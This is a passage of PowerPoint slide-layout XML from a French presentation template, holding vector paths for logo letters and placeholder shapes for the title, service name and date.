            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4724018" y="4356139"/>
              <a:ext cx="319788" cy="434553"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 308470 w 319788"/>
                <a:gd name="connsiteY0" fmla="*/ 82560 h 434553"/>
                <a:gd name="connsiteX1" fmla="*/ 276275 w 319788"/>
                <a:gd name="connsiteY1" fmla="*/ 38078 h 434553"/>
                <a:gd name="connsiteX2" fmla="*/ 226840 w 319788"/>
                <a:gd name="connsiteY2" fmla="*/ 9503 h 434553"/>
                <a:gd name="connsiteX3" fmla="*/ 163975 w 319788"/>
                <a:gd name="connsiteY3" fmla="*/ -22 h 434553"/>
                <a:gd name="connsiteX4" fmla="*/ -45 w 319788"/>
                <a:gd name="connsiteY4" fmla="*/ -22 h 434553"/>
                <a:gd name="connsiteX5" fmla="*/ -45 w 319788"/>
                <a:gd name="connsiteY5" fmla="*/ 434509 h 434553"/>
                <a:gd name="connsiteX6" fmla="*/ 88823 w 319788"/>
                <a:gd name="connsiteY6" fmla="*/ 434509 h 434553"/>
                <a:gd name="connsiteX7" fmla="*/ 88823 w 319788"/>
                <a:gd name="connsiteY7" fmla="*/ 281061 h 434553"/>
                <a:gd name="connsiteX8" fmla="*/ 163689 w 319788"/>
                <a:gd name="connsiteY8" fmla="*/ 281061 h 434553"/>
                <a:gd name="connsiteX9" fmla="*/ 226554 w 319788"/>
                <a:gd name="connsiteY9" fmla="*/ 270869 h 434553"/>
                <a:gd name="connsiteX10" fmla="*/ 275989 w 319788"/>
                <a:gd name="connsiteY10" fmla="*/ 242294 h 434553"/>
                <a:gd name="connsiteX11" fmla="*/ 308184 w 319788"/>
                <a:gd name="connsiteY11" fmla="*/ 197813 h 434553"/>
                <a:gd name="connsiteX12" fmla="*/ 319709 w 319788"/>
                <a:gd name="connsiteY12" fmla="*/ 140663 h 434553"/>
                <a:gd name="connsiteX13" fmla="*/ 308470 w 319788"/>
                <a:gd name="connsiteY13" fmla="*/ 82560 h 434553"/>
                <a:gd name="connsiteX14" fmla="*/ 211981 w 319788"/>
                <a:gd name="connsiteY14" fmla="*/ 185906 h 434553"/>
                <a:gd name="connsiteX15" fmla="*/ 163689 w 319788"/>
                <a:gd name="connsiteY15" fmla="*/ 203337 h 434553"/>
                <a:gd name="connsiteX16" fmla="*/ 89204 w 319788"/>
                <a:gd name="connsiteY16" fmla="*/ 203337 h 434553"/>
                <a:gd name="connsiteX17" fmla="*/ 89204 w 319788"/>
                <a:gd name="connsiteY17" fmla="*/ 78274 h 434553"/>
                <a:gd name="connsiteX18" fmla="*/ 163689 w 319788"/>
                <a:gd name="connsiteY18" fmla="*/ 78274 h 434553"/>
                <a:gd name="connsiteX19" fmla="*/ 212362 w 319788"/>
                <a:gd name="connsiteY19" fmla="*/ 95324 h 434553"/>
                <a:gd name="connsiteX20" fmla="*/ 229507 w 319788"/>
                <a:gd name="connsiteY20" fmla="*/ 140186 h 434553"/>
                <a:gd name="connsiteX21" fmla="*/ 211981 w 319788"/>
                <a:gd name="connsiteY21" fmla="*/ 185906 h 43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9788" h="434553">
                  <a:moveTo>
                    <a:pt x="308470" y="82560"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="301116" y="65557"/>
                    <a:pt x="290134" y="50373"/>
                    <a:pt x="276275" y="38078"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="261844" y="25381"/>
                    <a:pt x="245042" y="15669"/>
                    <a:pt x="226840" y="9503"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206562" y="2865"/>
                    <a:pt x="185311" y="-353"/>
                    <a:pt x="163975" y="-22"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="-45" y="-22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="-45" y="434509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="434509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="281061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163689" y="281061"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="185073" y="281320"/>
                    <a:pt x="206342" y="277872"/>
                    <a:pt x="226554" y="270869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="244747" y="264677"/>
                    <a:pt x="261540" y="254967"/>
                    <a:pt x="275989" y="242294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289743" y="229907"/>
                    <a:pt x="300716" y="214747"/>
                    <a:pt x="308184" y="197813"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316061" y="179803"/>
                    <a:pt x="319985" y="160317"/>
                    <a:pt x="319709" y="140663"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320147" y="120715"/>
                    <a:pt x="316318" y="100905"/>
                    <a:pt x="308470" y="82560"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="211981" y="185906"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="198951" y="198081"/>
                    <a:pt x="181492" y="204382"/>
                    <a:pt x="163689" y="203337"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="89204" y="203337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89204" y="78274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163689" y="78274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="181549" y="77133"/>
                    <a:pt x="199113" y="83285"/>
                    <a:pt x="212362" y="95324"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224002" y="107283"/>
                    <a:pt x="230203" y="123511"/>
                    <a:pt x="229507" y="140186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230136" y="157178"/>
                    <a:pt x="223811" y="173692"/>
                    <a:pt x="211981" y="185906"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="222221"/>
            </a:solid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EE1B2DC3-03A3-4A12-A254-6A04EB8DB05E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5129116" y="4348474"/>
              <a:ext cx="320413" cy="450200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 291991 w 320413"/>
                <a:gd name="connsiteY0" fmla="*/ 244245 h 450200"/>
                <a:gd name="connsiteX1" fmla="*/ 212648 w 320413"/>
                <a:gd name="connsiteY1" fmla="*/ 192620 h 450200"/>
                <a:gd name="connsiteX2" fmla="*/ 163213 w 320413"/>
                <a:gd name="connsiteY2" fmla="*/ 170807 h 450200"/>
                <a:gd name="connsiteX3" fmla="*/ 125685 w 320413"/>
                <a:gd name="connsiteY3" fmla="*/ 149757 h 450200"/>
                <a:gd name="connsiteX4" fmla="*/ 112540 w 320413"/>
                <a:gd name="connsiteY4" fmla="*/ 121182 h 450200"/>
                <a:gd name="connsiteX5" fmla="*/ 128352 w 320413"/>
                <a:gd name="connsiteY5" fmla="*/ 89273 h 450200"/>
                <a:gd name="connsiteX6" fmla="*/ 166452 w 320413"/>
                <a:gd name="connsiteY6" fmla="*/ 78986 h 450200"/>
                <a:gd name="connsiteX7" fmla="*/ 213505 w 320413"/>
                <a:gd name="connsiteY7" fmla="*/ 92226 h 450200"/>
                <a:gd name="connsiteX8" fmla="*/ 249414 w 320413"/>
                <a:gd name="connsiteY8" fmla="*/ 129088 h 450200"/>
                <a:gd name="connsiteX9" fmla="*/ 309994 w 320413"/>
                <a:gd name="connsiteY9" fmla="*/ 82320 h 450200"/>
                <a:gd name="connsiteX10" fmla="*/ 254367 w 320413"/>
                <a:gd name="connsiteY10" fmla="*/ 23360 h 450200"/>
                <a:gd name="connsiteX11" fmla="*/ 165785 w 320413"/>
                <a:gd name="connsiteY11" fmla="*/ 24 h 450200"/>
                <a:gd name="connsiteX12" fmla="*/ 109111 w 320413"/>
                <a:gd name="connsiteY12" fmla="*/ 8501 h 450200"/>
                <a:gd name="connsiteX13" fmla="*/ 63391 w 320413"/>
                <a:gd name="connsiteY13" fmla="*/ 32885 h 450200"/>
                <a:gd name="connsiteX14" fmla="*/ 33102 w 320413"/>
                <a:gd name="connsiteY14" fmla="*/ 71747 h 450200"/>
                <a:gd name="connsiteX15" fmla="*/ 21957 w 320413"/>
                <a:gd name="connsiteY15" fmla="*/ 122801 h 450200"/>
                <a:gd name="connsiteX16" fmla="*/ 29863 w 320413"/>
                <a:gd name="connsiteY16" fmla="*/ 164235 h 450200"/>
                <a:gd name="connsiteX17" fmla="*/ 51580 w 320413"/>
                <a:gd name="connsiteY17" fmla="*/ 197858 h 450200"/>
                <a:gd name="connsiteX18" fmla="*/ 84822 w 320413"/>
                <a:gd name="connsiteY18" fmla="*/ 225195 h 450200"/>
                <a:gd name="connsiteX19" fmla="*/ 127304 w 320413"/>
                <a:gd name="connsiteY19" fmla="*/ 247960 h 450200"/>
                <a:gd name="connsiteX20" fmla="*/ 173405 w 320413"/>
                <a:gd name="connsiteY20" fmla="*/ 269010 h 450200"/>
                <a:gd name="connsiteX21" fmla="*/ 214267 w 320413"/>
                <a:gd name="connsiteY21" fmla="*/ 291394 h 450200"/>
                <a:gd name="connsiteX22" fmla="*/ 228745 w 320413"/>
                <a:gd name="connsiteY22" fmla="*/ 323017 h 450200"/>
                <a:gd name="connsiteX23" fmla="*/ 212553 w 320413"/>
                <a:gd name="connsiteY23" fmla="*/ 358545 h 450200"/>
                <a:gd name="connsiteX24" fmla="*/ 168166 w 320413"/>
                <a:gd name="connsiteY24" fmla="*/ 371118 h 450200"/>
                <a:gd name="connsiteX25" fmla="*/ 103968 w 320413"/>
                <a:gd name="connsiteY25" fmla="*/ 352068 h 450200"/>
                <a:gd name="connsiteX26" fmla="*/ 80536 w 320413"/>
                <a:gd name="connsiteY26" fmla="*/ 331970 h 450200"/>
                <a:gd name="connsiteX27" fmla="*/ 61486 w 320413"/>
                <a:gd name="connsiteY27" fmla="*/ 308253 h 450200"/>
                <a:gd name="connsiteX28" fmla="*/ -45 w 320413"/>
                <a:gd name="connsiteY28" fmla="*/ 353878 h 450200"/>
                <a:gd name="connsiteX29" fmla="*/ 168166 w 320413"/>
                <a:gd name="connsiteY29" fmla="*/ 450080 h 450200"/>
                <a:gd name="connsiteX30" fmla="*/ 228079 w 320413"/>
                <a:gd name="connsiteY30" fmla="*/ 441222 h 450200"/>
                <a:gd name="connsiteX31" fmla="*/ 276180 w 320413"/>
                <a:gd name="connsiteY31" fmla="*/ 415505 h 450200"/>
                <a:gd name="connsiteX32" fmla="*/ 308470 w 320413"/>
                <a:gd name="connsiteY32" fmla="*/ 374357 h 450200"/>
                <a:gd name="connsiteX33" fmla="*/ 320280 w 320413"/>
                <a:gd name="connsiteY33" fmla="*/ 319683 h 450200"/>
                <a:gd name="connsiteX34" fmla="*/ 291991 w 320413"/>
                <a:gd name="connsiteY34" fmla="*/ 244245 h 4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0413" h="450200">
                  <a:moveTo>
                    <a:pt x="291991" y="244245"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="268969" y="222276"/>
                    <a:pt x="242061" y="204771"/>
                    <a:pt x="212648" y="192620"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="163213" y="170807"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="150021" y="165086"/>
                    <a:pt x="137448" y="158033"/>
                    <a:pt x="125685" y="149757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116884" y="142963"/>
                    <a:pt x="111969" y="132286"/>
                    <a:pt x="112540" y="121182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111635" y="108465"/>
                    <a:pt x="117684" y="96255"/>
                    <a:pt x="128352" y="89273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139763" y="82180"/>
                    <a:pt x="153021" y="78603"/>
                    <a:pt x="166452" y="78986"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183101" y="78626"/>
                    <a:pt x="199484" y="83236"/>
                    <a:pt x="213505" y="92226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227869" y="101926"/>
                    <a:pt x="240099" y="114472"/>
                    <a:pt x="249414" y="129088"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="309994" y="82320"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="296887" y="58168"/>
                    <a:pt x="277713" y="37846"/>
                    <a:pt x="254367" y="23360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227697" y="7217"/>
                    <a:pt x="196941" y="-885"/>
                    <a:pt x="165785" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146573" y="-105"/>
                    <a:pt x="127447" y="2755"/>
                    <a:pt x="109111" y="8501"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92433" y="13580"/>
                    <a:pt x="76898" y="21863"/>
                    <a:pt x="63391" y="32885"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50685" y="43576"/>
                    <a:pt x="40369" y="56816"/>
                    <a:pt x="33102" y="71747"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25491" y="87677"/>
                    <a:pt x="21681" y="105152"/>
                    <a:pt x="21957" y="122801"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21710" y="137010"/>
                    <a:pt x="24396" y="151116"/>
                    <a:pt x="29863" y="164235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35140" y="176596"/>
                    <a:pt x="42484" y="187967"/>
                    <a:pt x="51580" y="197858"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61372" y="208437"/>
                    <a:pt x="72554" y="217634"/>
                    <a:pt x="84822" y="225195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98481" y="233679"/>
                    <a:pt x="112674" y="241283"/>
                    <a:pt x="127304" y="247960"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173405" y="269010"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187721" y="275118"/>
                    <a:pt x="201408" y="282615"/>
                    <a:pt x="214267" y="291394"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224106" y="298830"/>
                    <a:pt x="229545" y="310713"/>
                    <a:pt x="228745" y="323017"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229469" y="336792"/>
                    <a:pt x="223421" y="350052"/>
                    <a:pt x="212553" y="358545"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199551" y="367517"/>
                    <a:pt x="183940" y="371937"/>
                    <a:pt x="168166" y="371118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145306" y="371594"/>
                    <a:pt x="122865" y="364935"/>
                    <a:pt x="103968" y="352068"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95500" y="346174"/>
                    <a:pt x="87651" y="339441"/>
                    <a:pt x="80536" y="331970"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73573" y="324575"/>
                    <a:pt x="67201" y="316645"/>
                    <a:pt x="61486" y="308253"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="-45" y="353878"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="33578" y="414924"/>
                    <a:pt x="98500" y="452054"/>
                    <a:pt x="168166" y="450080"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188473" y="450259"/>
                    <a:pt x="208686" y="447270"/>
                    <a:pt x="228079" y="441222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245614" y="435818"/>
                    <a:pt x="261949" y="427087"/>
                    <a:pt x="276180" y="415505"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289829" y="404323"/>
                    <a:pt x="300859" y="390275"/>
                    <a:pt x="308470" y="374357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316499" y="357264"/>
                    <a:pt x="320538" y="338567"/>
                    <a:pt x="320280" y="319683"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321433" y="291747"/>
                    <a:pt x="311232" y="264534"/>
                    <a:pt x="291991" y="244245"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="222221"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fr-FR"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78603928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B">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Espace réservé pour une image  16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F045770-4D39-4D4E-A626-69BDE64275FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="6096000" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 6096000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 6036373 w 6096000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 6096000 w 6096000"/>
              <a:gd name="connsiteY2" fmla="*/ 1517 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 6096000 w 6096000"/>
              <a:gd name="connsiteY3" fmla="*/ 3810000 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 3048000 w 6096000"/>
              <a:gd name="connsiteY4" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 6096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36373" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6096000" y="1517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6096000" y="3810000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6096000" y="5493365"/>
                  <a:pt x="4731364" y="6858000"/>
                  <a:pt x="3048000" y="6858000"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="685800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13" name="Titre 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2321F711-C6A3-4E30-826E-342C89E82041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6598920" y="1899670"/>
            <a:ext cx="4465320" cy="1077218"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="3200" b="1" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Gilroy Bold" panose="020B0604020202020204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Titre </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>de la présentation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Espace réservé de la date 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCED748E-3554-4E64-8655-DEC5066E10E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6598920" y="4194049"/>
            <a:ext cx="4434523" cy="313932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1400" spc="100" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Image 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F73DD153-1890-41CA-88BE-F3C5FFC3F4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497566" y="5779494"/>
            <a:ext cx="2436585" cy="272324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Espace réservé du texte 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB7C53B9-DF90-464D-B534-76AF91D84F83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6598920" y="3859372"/>
            <a:ext cx="4434523" cy="313932"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="1600" cap="none" spc="100" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Gilroy Bold" panose="00000800000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Nom du service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Groupe 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01ED189E-3B09-4B00-BBD7-C023AB1BBFFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="0"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C53FB59D-2515-4426-ADF5-4C0C19AF5F7D}"/>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2" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C651BE91-5190-49B7-9C6B-620DC459697D}"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1612802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 + Title + Txt B">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Espace réservé pour une image  36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BF4E86B-9E00-4211-9704-28C3ED86A413}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="5090160" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5090160"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY2" fmla="*/ 3429000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY3" fmla="*/ 3719195 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY4" fmla="*/ 4747789 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY5" fmla="*/ 4951799 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY6" fmla="*/ 4951800 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY7" fmla="*/ 4987731 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY8" fmla="*/ 5030435 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 5089114 w 5090160"/>
              <a:gd name="connsiteY9" fmla="*/ 5030435 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 5087876 w 5090160"/>
              <a:gd name="connsiteY10" fmla="*/ 5080986 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 3316135 w 5090160"/>
